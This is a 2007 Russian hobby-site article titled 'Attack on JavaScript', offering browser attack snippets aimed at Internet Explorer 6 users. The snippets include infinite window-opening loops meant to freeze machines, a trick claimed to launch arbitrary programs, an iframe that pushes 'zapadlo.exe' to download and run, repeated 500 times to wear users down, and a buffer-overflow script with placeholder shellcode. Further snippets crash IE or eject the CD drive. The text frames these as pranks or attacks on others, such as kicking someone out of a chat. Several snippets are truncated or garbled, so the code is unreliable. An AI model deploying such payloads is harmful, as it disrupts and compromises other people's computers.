Четверг, 2020-08-13, 10:31:00
Приветствую Вас Гость | RSS
 
Главная страница Каталог статейРегистрацияВход
Меню сайта
Категории каталога
Статьи [9]
немного о городе в которов я живу [2]
Спутниковое ТВ [8]
Юмор [10]
Фото [20]
Разное [10]
Здоровье [17]
Кухня [30]
Оч!умелые ручки [15]
Dbox 2 [8]
Диеты [11]
Eros [22]
Кошки [11]
Собаки [7]
Статьи о взломе и хакерстве [1]
Аквариум [32]
Виноделие [23]
Уроки Фотошоп [24]
Компьютер [0]
Начало » Статьи » Статьи о взломе и хакерстве

Атака на JavaScript.
Атака на JavaScript.
Принято считать, что программы на JavaScript безопасные, т.к. выполняются на виртуальной машине. JavaScript будет работать на любом хостинге, программный код выполняется по умолчанию, не спрашивая разрешения пользователя. Всё это делает возможным использования вредоносного программного кода на JavaScript доступным даже для неопытного пользователя. Для этого достаточно зарегистрироваться на любом бесплатном хостинге, создать файл index.html, положить его в корневую директорию сервера и залить туда JavaScript код. В рамках этой статьи я рассмотрю лишь некоторые уязвимости к атакам на JavaScript, найденные в Internet Explorer 6.0.
Этот код начинает бесконечный цикл в следствии которого открывается множество новых окон, что приводит к зависанию компа:
&ltscript>
now();
function now(){for (i=1;i&gt0;i++){open('die.htm','new'+i);}}

Вот ещё один код, который открывает множество окон:
&lthtml>
&lthead>
&ltscript language = javascript>
function generate_windows(){
var i=1;
while (i < 10000){ // Главный цикл
window.open("script3.htm"); // Новое окно с ссылкой на тот же HTML файл
i++;
}
}


&ltbody onload= "generate_windows()">


А вот этот код позволяет запустить на компьютере пользователя любую программу, если известен путь к ней. Думаю, что не стоит говорить, что это достаточно серьёзный баг. В данном примере будет запущен редактор реестра:
&ltspan datasrc="#oExec" datafld="exploit" dataformatas="html">
&ltxml id="oExec">
&ltsecurity>&ltexploit>

Следующий код позволяет инициировать загрузку любого файла с сервера. Многие пользователи нажимают на кнопки даже не читая, что написано в окне предупреждения. Если в данном случае пользователь нажмёт "открыть", на его компьютер загрузится и выполнится указанный вами файл. Если данный код повторить раз 500, то есть хороший шанс, что атакуемый товарищ всё же нажмём "открыть". Также возможно зависания компа, когда открываемые окна сожрут все ресурсы. А вот и код:
&ltiframe src="zapadlo.exe">
Ниже приведены два кода, каждый из которых вызывает переполнение буфера в Internet Explorer и закрытие всех или части его окон. Можно, например, кого-то выкинуть из чата. Вот первый:

&ltobject id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" VIEWASTEXT

А вот второй:
&ltscript>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="??????";
shellcode = "???????";
for(i=0; i&lt7; i++)buffer+=buffer;
buffer=buffer.substring(0, buffer.length-shellcode.length);
buffer+=shellcode;
for(; i&lt16; i++)buffer+=buffer;
for(i=0; i&lt2; i++)WndDoc.write(buffer);
buffer="";
for(i=1;i<=127;i++)buffer+="A";
buffer+="3APA3A ";
WndDoc.write("&ltHR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();


А с помощью вот этого кода можно открыть CD-ROM на атакуемом компьютере, пользы никакой, зато эффектно :)). А вот и код:

&ltSCRIPT language="VBScript">



А вот ещё один код, который закрывает браузер IE:

&ltobject>
classid="clsid:7007ACCF-3202-11D1-AAD2-00805FC1270E">


Как видим, JavaScript оказался не таким уж и безобидным. А что же говорить об элементах ActiveX! С их помощью можно вообще делать с компом атакуемого всё, что угодно, т.к. ActiveX является полноценной программной, в отличии от JavaScript, который выполняется на виртуальной машине Java! Подробно об этом написано на http://antichat.ru в статье по ActiveX, очень советую почитать.
Категория: Статьи о взломе и хакерстве | Добавил: baburoff (2007-10-31)
Просмотров: 854

Форма входа
Поиск по каталогу
Статистика
Copyright MyCorp © 2006